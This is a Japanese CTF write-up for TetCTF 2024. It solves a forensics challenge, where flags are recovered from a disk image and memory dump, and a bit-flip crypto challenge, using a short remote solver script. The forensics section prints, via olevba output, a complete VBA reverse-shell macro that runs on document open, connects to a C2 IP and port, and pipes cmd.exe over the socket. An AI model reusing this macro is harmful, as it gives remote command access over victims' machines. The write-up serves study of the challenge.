この大会は2024/1/27 9:00(JST)~2024/1/29 9:00(JST)に開催されました。
今回もチームで参戦。結果は300点で838チーム中83位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome (MISCELLANEOUS)
指定のURLのページにフラグが書いてあった。
TetCTF{__Hapi_hapi_HaPi_New_Year__}
TET & 4N6 (MISCELLANEOUS)
問題は以下のようになっている。
1.Find the malicious code and tell me the IP and Port C2 2.What was the first flag you found? 3.After registering an account, I no longer remember anything about my account. Can you help me find and get the second flag? Format : TetCTF{IP:Port_Flag1_Flag2} Ex: TetCTF{1.1.1.1:1234_Hello_HappyForensics}
添付ファイルにはディスクイメージとメモリダンプがある。まずFTK ImagerでBackup.ad1を開く。
C:\Users\Stirring\AppData\Roaming\Microsoft\Windows\RecentにTetCTF2024-Rulesのショートカットが見つかるが、本体はad1内のパスにはない。
C:\Users\Stirring\AppData\Roaming\Microsoft\TemplatesにあるNormal.dotmをエクスポートする。
$ olevba Normal.dotm olevba 0.60.1 on Python 3.6.9 - http://decalage.info/python/oletools =============================================================================== FILE: Normal.dotm Type: OpenXML WARNING For now, VBA stomping cannot be detected for files in memory ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO NewMacros.bas in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 'Coppy Const ip = "172.20.25.15" Const port = "4444" Const INVALID_SOCKET = -1 Const WSADESCRIPTION_LEN = 256 Const SOCKET_ERROR = -1 Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As Long End Type Private Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As LongPtr ai_addr As LongPtr ai_next As LongPtr End Type Private Type STARTUPINFOA cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As String hStdInput As LongPtr hStdOutput As LongPtr hStdError As LongPtr End Type Private Type PROCESS_INFORMATION hProcess As LongPtr hThread As LongPtr dwProcessId As Long dwThreadId As Long End Type Enum af AF_UNSPEC = 0 AF_INET = 2 AF_IPX = 6 AF_APPLETALK = 16 AF_NETBIOS = 17 AF_INET6 = 23 AF_IRDA = 26 AF_BTH = 32 End Enum Enum sock_type SOCK_STREAM = 1 SOCK_DGRAM = 2 SOCK_RAW = 3 SOCK_RDM = 4 SOCK_SEQPACKET = 5 End Enum Private Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" () Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As Long Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long Private Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long) Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long Function revShell() Dim m_wsaData As WSADATA Dim m_RetVal As Integer Dim m_Hints As ADDRINFO Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET Dim pAddrInfo As LongPtr Dim RetVal As Long Dim lastError As Long Dim iRC As Long Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512 RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData) If (RetVal <> 0) Then MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_family = af.AF_UNSPEC m_Hints.ai_socktype = sock_type.SOCK_STREAM RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo) If (RetVal <> 0) Then MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_next = pAddrInfo Dim connected As Boolean: connected = False Do While m_Hints.ai_next > 0 CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints) m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, ByVal 0&, 0, 0) If (m_ConnSocket = INVALID_SOCKET) Then revShell = False Else Dim connectionResult As Long connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen) If connectionResult <> SOCKET_ERROR Then connected = True Exit Do End If closesocket (m_ConnSocket) revShell = False End If Loop If Not connected Then revShell = False RetVal = closesocket(m_ConnSocket) Call WSACleanup Exit Function End If Dim si As STARTUPINFOA ZeroMemory si, Len(si) si.cb = Len(si) si.dwFlags = &H100 si.hStdInput = m_ConnSocket si.hStdOutput = m_ConnSocket si.hStdError = m_ConnSocket Dim pi As PROCESS_INFORMATION Dim worked As LongPtr Dim test As Long worked = CreateProc(vbNullString, "cmd", ByVal 0&, ByVal 0&, True, &H8000000, 0, vbNullString, si, pi) revShell = worked End Function Public Function MAKEWORD(Lo As Byte, Hi As Byte) As Integer MAKEWORD = Lo + Hi * 256& Or 32768 * (Hi > 127) End Function Sub AutoOpen() Dim success As Boolean success = revShell() End Sub 'Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 +----------+--------------------+---------------------------------------------+ |Type |Keyword |Description | +----------+--------------------+---------------------------------------------+ |AutoExec |AutoOpen |Runs when the Word document is opened | |Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)| |Suspicious|Lib |May run code from a DLL | |Suspicious|RtlMoveMemory |May inject code into another process | |Suspicious|Hex Strings |Hex-encoded strings were detected, may be | | | |used to obfuscate strings (option --decode to| | | |see all) | |IOC |172.20.25.15 |IPv4 address | |IOC |ws2_32.dll |Executable file name | +----------+--------------------+---------------------------------------------+ /usr/local/lib/python3.6/dist-packages/msoffcrypto/method/ecma376_agile.py:8: CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team. Therefore, support for it is deprecated in cryptography and will be removed in a future release. from cryptography.hazmat.backends import default_backend
C2のIPアドレスとポートは以下のように設定されている。
Const ip = "172.20.25.15" Const port = "4444"
コメントにbase64文字列があるのでデコードする。
$ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d VlcweE5HRkdjRFpTVkZwS1VteHdSRlZXVFhoVWF6VklWR3hPVGxGVU1Eaz0=ctf@ctf-virtual-machine:/mnt/hgfs/Shared/work$ $ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d VW0xNGFGcDZSVFpKUmxwRFVWTXhUazVIVGxOTlFUMDk= $ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d | base64 -d Um14aFp6RTZJRlpDUVMxTk5HTlNNQT09 $ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d | base64 -d | base64 -d RmxhZzE6IFZCQS1NNGNSMA== $ echo Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9 | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d Flag1: VBA-M4cR0
Flag1が見つかった。
今度はメモリダンプを見てみる。
$ volatility -f TETCTF-2024-20240126-203010.raw imageinfo Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... WARNING : volatility.debug : Overlay structure cpuinfo_x86 not present in vtypes Suggested Profile(s) : Win8SP0x64, Win81U1x64, Win2012R2x64_18340, Win2012R2x64, Win2012x64, Win8SP1x64_18340, Win8SP1x64 AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/TETCTF-2024-20240126-203010.raw) PAE type : No PAE DTB : 0x1ab000L KDBG : 0xf8018c2bb530L Number of Processors : 8 Image Type (Service Pack) : 0 KPCR for CPU 0 : 0xfffff8018c318000L KPCR for CPU 1 : 0xffffd000cb7b1000L KPCR for CPU 2 : 0xffffd000cf844000L KPCR for CPU 3 : 0xffffd000cf8ca000L KPCR for CPU 4 : 0xffffd000cb744000L KPCR for CPU 5 : 0xffffd000cb867000L KPCR for CPU 6 : 0xffffd000cb92d000L KPCR for CPU 7 : 0xffffd000cb9c0000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2024-01-26 20:30:12 UTC+0000 Image local date and time : 2024-01-26 12:30:12 -0800 $ volatility -f TETCTF-2024-20240126-203010.raw --profile=Win8SP1x64 pstree Volatility Foundation Volatility Framework 2.6 Name Pid PPid Thds Hnds Time -------------------------------------------------- ------ ------ ------ ------ ---- 0xffffe000f2f82900:wininit.exe 516 440 1 0 2024-01-26 17:06:54 UTC+0000 . 0xffffe000f3031900:services.exe 608 516 3 0 2024-01-26 17:06:54 UTC+0000 .. 0xffffe000f3273400:svchost.exe 512 608 22 0 2024-01-26 17:06:55 UTC+0000 .. 0xffffe000f396b900:dllhost.exe 1968 608 11 0 2024-01-26 17:06:57 UTC+0000 .. 0xffffe000f3347900:spoolsv.exe 1072 608 9 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f2fd2900:svchost.exe 952 608 31 0 2024-01-26 17:06:55 UTC+0000 .. 0xffffe000f3365700:svchost.exe 1108 608 23 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f39dc680:svchost.exe 2136 608 6 0 2024-01-26 17:06:57 UTC+0000 .. 0xffffe000f34ed900:vmtoolsd.exe 1384 608 13 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f3166900:svchost.exe 700 608 10 0 2024-01-26 17:06:55 UTC+0000 ... 0xffffe000f3f0a900:WmiPrvSE.exe 6320 700 6 0 2024-01-26 20:30:38 UTC+0000 ... 0xffffe000f395b900:WmiPrvSE.exe 2288 700 10 0 2024-01-26 17:06:57 UTC+0000 ... 0xffffe000f19cb080:SystemSettings 3952 700 25 0 2024-01-26 17:10:17 UTC+0000 ... 0xffffe000f16b9900:RuntimeBroker. 2524 700 2 0 2024-01-26 20:15:02 UTC+0000 ... 0xffffe000f0f6a480:dllhost.exe 2556 700 3 0 2024-01-26 17:07:10 UTC+0000 .. 0xffffe000f36274c0:msdtc.exe 2300 608 9 0 2024-01-26 17:06:57 UTC+0000 .. 0xffffe000f0bea900:OfficeClickToR 3844 608 24 0 2024-01-26 17:09:11 UTC+0000 ... 0xffffe000f3e5a900:AppVShNotify.e 3820 3844 1 0 2024-01-26 17:12:29 UTC+0000 .. 0xffffe000f2fde900:svchost.exe 728 608 8 0 2024-01-26 17:06:55 UTC+0000 .. 0xffffe000f344e900:VGAuthService. 1316 608 2 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f38e2500:svchost.exe 2012 608 16 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f156e500:msiexec.exe 9148 608 5 0 2024-01-26 20:22:01 UTC+0000 .. 0xffffe000f34ca580:vm3dservice.ex 1360 608 3 0 2024-01-26 17:06:56 UTC+0000 ... 0xffffe000f34e8080:vm3dservice.ex 1404 1360 4 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f158f2c0:svchost.exe 8264 608 3 0 2024-01-26 20:22:01 UTC+0000 .. 0xffffe000f2fd4900:svchost.exe 892 608 62 0 2024-01-26 17:06:55 UTC+0000 ... 0xffffe000f0eba080:taskhostex.exe 3156 892 8 0 2024-01-26 17:07:17 UTC+0000 ... 0xffffe000f3fe0440:taskeng.exe 8076 892 2 0 2024-01-26 20:17:38 UTC+0000 ... 0xffffe000f178d080:WMIADAP.exe 8004 892 5 0 2024-01-26 20:30:38 UTC+0000 ... 0xffffe000f1297900:taskhost.exe 6056 892 9 0 2024-01-26 17:21:56 UTC+0000 ... 0xffffe000f0983900:taskhost.exe 1984 892 6 0 2024-01-26 17:09:02 UTC+0000 .. 0xffffe000f3478080:MsMpEng.exe 1436 608 31 0 2024-01-26 17:06:56 UTC+0000 .. 0xffffe000f40bb900:SearchIndexer. 4536 608 13 0 2024-01-26 17:13:06 UTC+0000 ... 0xffffe000f1bb3440:SearchFilterHo 6096 4536 4 0 2024-01-26 20:30:12 UTC+0000 ... 0xffffe000f1a63180:SearchProtocol 8088 4536 6 0 2024-01-26 20:30:12 UTC+0000 .. 0xffffe000f31d1900:svchost.exe 848 608 25 0 2024-01-26 17:06:55 UTC+0000 ... 0xffffe000f0061900:audiodg.exe 2624 848 4 0 2024-01-26 20:21:58 UTC+0000 .. 0xffffe000f2fd0900:svchost.exe 1000 608 26 0 2024-01-26 17:06:55 UTC+0000 ... 0xffffe000f39d2900:WUDFHost.exe 2156 1000 6 0 2024-01-26 17:06:57 UTC+0000 ... 0xffffe000f3654640:dasHost.exe 2336 1000 8 0 2024-01-26 17:06:57 UTC+0000 ... 0xffffe000f18a1900:WUDFHost.exe 7120 1000 9 0 2024-01-26 20:20:49 UTC+0000 . 0xffffe000f3067080:lsass.exe 624 516 6 0 2024-01-26 17:06:54 UTC+0000 0xffffe000f29034c0:csrss.exe 460 440 10 0 2024-01-26 17:06:54 UTC+0000 0xffffe000f0ff6080:explorer.exe 3276 3268 73 0 2024-01-26 17:07:18 UTC+0000 . 0xffffe000f1c41080:chrome.exe 3108 3276 29 0 2024-01-26 17:16:14 UTC+0000 .. 0xffffe000f16f5900:chrome.exe 3328 3108 16 0 2024-01-26 20:14:33 UTC+0000 .. 0xffffe000f1449900:chrome.exe 3592 3108 20 0 2024-01-26 17:22:51 UTC+0000 .. 0xffffe000f1430900:chrome.exe 2080 3108 19 0 2024-01-26 17:16:25 UTC+0000 .. 0xffffe000f067f900:chrome.exe 3112 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f1623080:chrome.exe 7176 3108 16 0 2024-01-26 20:15:21 UTC+0000 .. 0xffffe000f3e32900:chrome.exe 2100 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f05bb900:chrome.exe 4704 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f19f4080:chrome.exe 5560 3108 16 0 2024-01-26 17:22:28 UTC+0000 .. 0xffffe000f36b7080:chrome.exe 4680 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f0a8f900:chrome.exe 6732 3108 16 0 2024-01-26 17:22:35 UTC+0000 .. 0xffffe000f0a76900:chrome.exe 8804 3108 16 0 2024-01-26 20:16:00 UTC+0000 .. 0xffffe000f1bd7680:chrome.exe 6844 3108 16 0 2024-01-26 17:22:35 UTC+0000 .. 0xffffe000f1c26580:chrome.exe 3692 3108 7 0 2024-01-26 17:16:17 UTC+0000 .. 0xffffe000f3d75700:chrome.exe 1300 3108 16 0 2024-01-26 20:15:21 UTC+0000 .. 0xffffe000f2050080:chrome.exe 5920 3108 16 0 2024-01-26 20:15:15 UTC+0000 .. 0xffffe000f080b900:chrome.exe 1152 3108 16 0 2024-01-26 20:15:21 UTC+0000 .. 0xffffe000f431b900:chrome.exe 2716 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f0b8f440:chrome.exe 160 3108 17 0 2024-01-26 20:14:27 UTC+0000 .. 0xffffe000f19af900:chrome.exe 2216 3108 7 0 2024-01-26 17:16:14 UTC+0000 .. 0xffffe000f1b10900:chrome.exe 8372 3108 16 0 2024-01-26 20:15:44 UTC+0000 .. 0xffffe000f101b900:chrome.exe 8888 3108 16 0 2024-01-26 20:16:02 UTC+0000 .. 0xffffe000f05c1900:chrome.exe 2752 3108 16 0 2024-01-26 20:15:19 UTC+0000 .. 0xffffe000f19c7900:chrome.exe 1568 3108 16 0 2024-01-26 20:15:14 UTC+0000 .. 0xffffe000f1a8e400:chrome.exe 2632 3108 16 0 2024-01-26 20:15:20 UTC+0000 .. 0xffffe000f14c9080:chrome.exe 6092 3108 16 0 2024-01-26 17:22:42 UTC+0000 .. 0xffffe000f083f780:chrome.exe 3960 3108 16 0 2024-01-26 20:15:21 UTC+0000 .. 0xffffe000f1650900:chrome.exe 4824 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f1464900:chrome.exe 2272 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f0af7900:chrome.exe 7912 3108 16 0 2024-01-26 20:15:43 UTC+0000 .. 0xffffe000f0679900:chrome.exe 6400 3108 16 0 2024-01-26 17:22:59 UTC+0000 .. 0xffffe000f1396480:chrome.exe 2868 3108 16 0 2024-01-26 20:15:20 UTC+0000 .. 0xffffe000f1248900:chrome.exe 4920 3108 16 0 2024-01-26 17:22:30 UTC+0000 .. 0xffffe000f2b13100:chrome.exe 4932 3108 16 0 2024-01-26 20:14:42 UTC+0000 .. 0xffffe000f3b75080:chrome.exe 5448 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f14a2900:chrome.exe 5432 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f176a080:chrome.exe 2388 3108 16 0 2024-01-26 17:22:33 UTC+0000 .. 0xffffe000f068d080:chrome.exe 5976 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f0a74900:chrome.exe 9188 3108 16 0 2024-01-26 20:16:12 UTC+0000 .. 0xffffe000f37f5900:chrome.exe 9060 3108 16 0 2024-01-26 20:16:11 UTC+0000 .. 0xffffe000f0890200:chrome.exe 5992 3108 7 0 2024-01-26 17:22:33 UTC+0000 .. 0xffffe000f1461900:chrome.exe 8980 3108 16 0 2024-01-26 20:16:10 UTC+0000 .. 0xffffe000f1b2a900:chrome.exe 7032 3108 16 0 2024-01-26 17:22:37 UTC+0000 .. 0xffffe000f17ac900:chrome.exe 7232 3108 16 0 2024-01-26 20:15:43 UTC+0000 .. 0xffffe000f3ebd900:chrome.exe 8452 3108 16 0 2024-01-26 20:15:46 UTC+0000 .. 0xffffe000f058b900:chrome.exe 7048 3108 16 0 2024-01-26 17:22:37 UTC+0000 .. 0xffffe000f143d900:chrome.exe 8608 3108 16 0 2024-01-26 20:15:49 UTC+0000 .. 0xffffe000f06a7840:chrome.exe 7836 3108 16 0 2024-01-26 20:15:40 UTC+0000 .. 0xffffe000f05aa900:chrome.exe 2992 3108 18 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f2abf540:chrome.exe 4168 3108 12 0 2024-01-26 17:16:16 UTC+0000 .. 0xffffe000f0959080:chrome.exe 2492 3108 16 0 2024-01-26 17:22:33 UTC+0000 .. 0xffffe000f13e9900:WINWORD.EXE 1992 3108 36 0 2024-01-26 17:23:04 UTC+0000 ... 0xffffe000f2f9d4c0:cmd.exe 5212 1992 1 0 2024-01-26 20:13:25 UTC+0000 .... 0xffffe000f1b26080:conhost.exe 6796 5212 1 0 2024-01-26 20:13:25 UTC+0000 ... 0xffffe000f3f64380:ai.exe 5396 1992 0 ------ 2024-01-26 17:23:09 UTC+0000 ... 0xffffe000f0fce900:cmd.exe 5004 1992 0 ------ 2024-01-26 17:25:24 UTC+0000 .. 0xffffe000f085b340:chrome.exe 4052 3108 20 0 2024-01-26 17:16:16 UTC+0000 .. 0xffffe000f0e43400:chrome.exe 996 3108 16 0 2024-01-26 17:22:33 UTC+0000 .. 0xffffe000f1d40900:chrome.exe 6636 3108 16 0 2024-01-26 20:15:21 UTC+0000 .. 0xffffe000f3379080:chrome.exe 4080 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f068d900:chrome.exe 3572 3108 16 0 2024-01-26 17:22:34 UTC+0000 .. 0xffffe000f1bb21c0:chrome.exe 6648 3108 16 0 2024-01-26 17:22:35 UTC+0000 .. 0xffffe000f15d5900:chrome.exe 4436 3108 16 0 2024-01-26 17:22:34 UTC+0000 . 0xffffe000f1073900:vmtoolsd.exe 3868 3276 10 0 2024-01-26 17:07:29 UTC+0000 . 0xffffe000f198b080:DumpIt.exe 7516 3276 3 0 2024-01-26 20:30:10 UTC+0000 .. 0xffffe000f3c3a4c0:conhost.exe 7140 7516 2 0 2024-01-26 20:30:10 UTC+0000 0xffffe000f00ae900:System 4 0 143 0 2024-01-26 17:06:38 UTC+0000 . 0xffffe000f284c040:smss.exe 352 4 2 0 2024-01-26 17:06:38 UTC+0000 0xffffe000f2f7e080:csrss.exe 524 508 11 0 2024-01-26 17:06:54 UTC+0000 0xffffe000f2fab080:winlogon.exe 568 508 4 0 2024-01-26 17:06:54 UTC+0000 . 0xffffe000f319e800:dwm.exe 832 568 7 0 2024-01-26 17:06:55 UTC+0000 0xffffe000f40ce480:GoogleCrashHan 3884 2344 3 0 2024-01-26 17:13:06 UTC+0000 0xffffe000f40b6900:GoogleCrashHan 4844 2344 3 0 2024-01-26 17:13:06 UTC+0000
ブラウザはChromeを使っているようなので、そのアクセス履歴を見る。
$ volatility --plugins=../plugins -f TETCTF-2024-20240126-203010.raw --profile=Win8SP1x64 chromehistory Volatility Foundation Volatility Framework 2.6 Index URL Title Visits Typed Last Visit Time Hidden Favicon ID ------ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ------ ----- -------------------------- ------ ---------- 19 https://pastebin.com/XRnpj2ja Flag 2: R3c0v3rry_34sy_R1ght? - Pastebin.com 2 0 2024-01-26 20:18:22.955264 N/A 13 https://pastebin.com/ Pastebin.com - #1 paste tool since 2002! 2 1 2024-01-26 20:17:18.361015 N/A 18 https://pastebin.com/u/tecij23311 Tecij23311's Pastebin - Pastebin.com 1 0 2024-01-26 20:17:15.028515 N/A 17 https://pastebin.com/login Pastebin.com - Login Page 1 0 2024-01-26 20:17:10.822121 N/A 16 https://pastebin.com/signup?__cf_chl_tk...UjPOCzdbM8xOw-1706300078-0-gaNycGzNDmU Just a moment... 1 0 2024-01-26 20:14:42.355274 N/A 15 https://pastebin.com/signup?__cf_chl_rt...UjPOCzdbM8xOw-1706300078-0-gaNycGzNDmU Just a moment... 1 0 2024-01-26 20:14:37.391253 N/A 6 https://pastebin.com/pusYyfAS TETCTF{flag} - Pastebin.com 2 1 2024-01-26 20:14:27.935153 N/A 11 https://ctf.hackemall.live/login TetCTF 2024 1 0 2024-01-26 20:14:01.418279 N/A 10 https://ctf.hackemall.live/register TetCTF 2024 1 0 2024-01-26 17:22:55.468108 N/A 9 https://ctf.hackemall.live/ TetCTF 2024 1 1 2024-01-26 17:22:52.236375 N/A 7 https://file.io/eKHCxsHdpFZc Download | file.io 1 0 2024-01-26 17:22:26.564913 N/A 8 https://www.file.io/GN6v/download/eKHCxsHdpFZc Download | file.io 1 0 2024-01-26 17:22:26.564913 N/A 14 https://pastebin.com/signup Pastebin.com - Sign Up Page 4 0 2024-01-26 20:15:52.888105 N/A 5 https://www.youtube.com/watch?v=gOtfJ151ue4 Tết Đong Đầy | KHOA x Kay Tran x Duck V | HOMIE BOIZ OFFICIAL - YouTube 1 0 2024-01-26 17:14:22.719342 N/A 3 https://youtube.com/ YouTube 1 0 2024-01-26 17:13:32.898449 N/A 1 https://accounts.google.com/signin/chro...ntinue=https%3A%2F%2Fwww.google.com%2F Sign in - Google Accounts 1 0 2024-01-26 17:13:29.301396 N/A 4 https://www.youtube.com/ YouTube 1 0 2024-01-26 17:13:32.898449 N/A 2 https://accounts.google.com/v3/signin/i...ync&dsh=S1963595838%3A1706289209093139 Sign in - Google Accounts 2 0 2024-01-26 17:13:30.531512 N/A
Flag 2が見つかった。
TetCTF{172.20.25.15:4444_VBA-M4cR0_R3c0v3rry_34sy_R1ght?}
flip (CRYPTO)
サーバの処理概要は以下の通り。
・OFFSET_PLAINTEXT = 0x4010 ・OFFSET_KEY = 0x4020 ・key: ランダム16バイト文字列 ・content: encryptの内容のbytearrayデータ ・plaintext_hex, i_str, j_str: 入力文字列をスペース区切りで3つに分けたもの ・pt: plaintext_hexのhexデコード文字列 ・ptの長さが16バイトであるかをチェック ・i: i_strを数値型にしたもの ・iが0以上contentの長さ未満であるかをチェック ・j: j_strを数値型にしたもの ・jが0以上8未満であるかをチェック ・content[OFFSET_KEY:OFFSET_KEY + 16] = key ・content[OFFSET_PLAINTEXT:OFFSET_PLAINTEXT + 16] = pt ・content[i] = content[i] ^ (1 << j) ・tmpfile: 一時ファイルオブジェクト ・一時ファイルにcontentを書き込み ・ciphertext: 一時ファイルを実行したときの出力 ・ciphertextの出力結果を16進数表記で表示 ・入力文字列のhexデコードしたものとkeyが一致している場合、フラグを表示
encryptをGhidraで逆アセンブルする。
************************************************************** * FUNCTION * ************************************************************** undefined main() undefined AL:1 <RETURN> undefined8 Stack[-0x10]:8 local_10 XREF[2]: 00101181(W), 001011d7(R) undefined1 Stack[-0xd8]:1 local_d8 XREF[2]: 00101187(*), 001011a0(*) main XREF[4]: Entry Point(*), _start:00101098(*), 00103258, 00103390(*) 00101169 f3 0f 1e fa ENDBR64 0010116d 55 PUSH RBP 0010116e 48 89 e5 MOV RBP,RSP 00101171 48 81 ec SUB RSP,0xd0 d0 00 00 00 00101178 64 48 8b MOV RAX,qword ptr FS:[0x28] 04 25 28 00 00 00 00101181 48 89 45 f8 MOV qword ptr [RBP + local_10],RAX 00101185 31 c0 XOR EAX,EAX 00101187 48 8d 85 LEA RAX=>local_d8,[RBP + -0xd0] 30 ff ff ff 0010118e 48 8d 15 LEA RDX,[key] 8b 3e 00 00 00101195 48 89 d6 MOV RSI=>key,RDX 00101198 48 89 c7 MOV RDI,RAX 0010119b e8 0c 03 CALL AES_init_ctx undefined AES_init_ctx() 00 00 001011a0 48 8d 85 LEA RAX=>local_d8,[RBP + -0xd0] 30 ff ff ff 001011a7 48 8d 15 LEA RDX,[plaintext] 62 3e 00 00 001011ae 48 89 d6 MOV RSI=>plaintext,RDX 001011b1 48 89 c7 MOV RDI,RAX 001011b4 e8 dc 11 CALL AES_ECB_encrypt undefined AES_ECB_encrypt() 00 00 001011b9 ba 10 00 MOV EDX,0x10 00 00 001011be 48 8d 05 LEA RAX,[plaintext] 4b 3e 00 00 001011c5 48 89 c6 MOV RSI=>plaintext,RAX 001011c8 bf 01 00 MOV EDI,0x1 00 00 001011cd e8 8e fe CALL <EXTERNAL>::write ssize_t write(int __fd, void * _ ff ff 001011d2 b8 00 00 MOV EAX,0x0 00 00 001011d7 48 8b 55 f8 MOV RDX,qword ptr [RBP + local_10] 001011db 64 48 2b SUB RDX,qword ptr FS:[0x28] 14 25 28 00 00 00 001011e4 74 05 JZ LAB_001011eb 001011e6 e8 85 fe CALL <EXTERNAL>::__stack_chk_fail undefined __stack_chk_fail() ff ff -- Flow Override: CALL_RETURN (CALL_TERMINATOR) LAB_001011eb XREF[1]: 001011e4(j) 001011eb c9 LEAVE 001011ec c3 RET
001011beで、keyを設定できれば、keyを表示するはず。
「4b 3e 00 00」の「4b」を「5b」に書き換えてみる。このために、plaintext_hexは任意の16バイト文字列の16進数表記、i_strに4545(=0x11c1)、j_strに4を指定すればよい。
#!/usr/bin/env python3 import socket def recvuntil(s, tail): data = b'' while True: if tail in data: return data.decode() data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('139.162.24.230', 31339)) plaintext_hex = ('a' * 16).encode().hex() i_str = str(0x11c1) j_str = str(4) ans = ' '.join([plaintext_hex, i_str, j_str]) print(ans) s.sendall(ans.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) key_hex = data print(key_hex) s.sendall(key_hex.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data)
実行結果は以下の通り。
61616161616161616161616161616161 4545 4 586d1c9f1564fa19976afad8b3e7d21e 586d1c9f1564fa19976afad8b3e7d21e TetCTF{fr0m_0n3_b1t_fl1pp3d_t0_full_k3y_r3c0v3ry}
TetCTF{fr0m_0n3_b1t_fl1pp3d_t0_full_k3y_r3c0v3ry}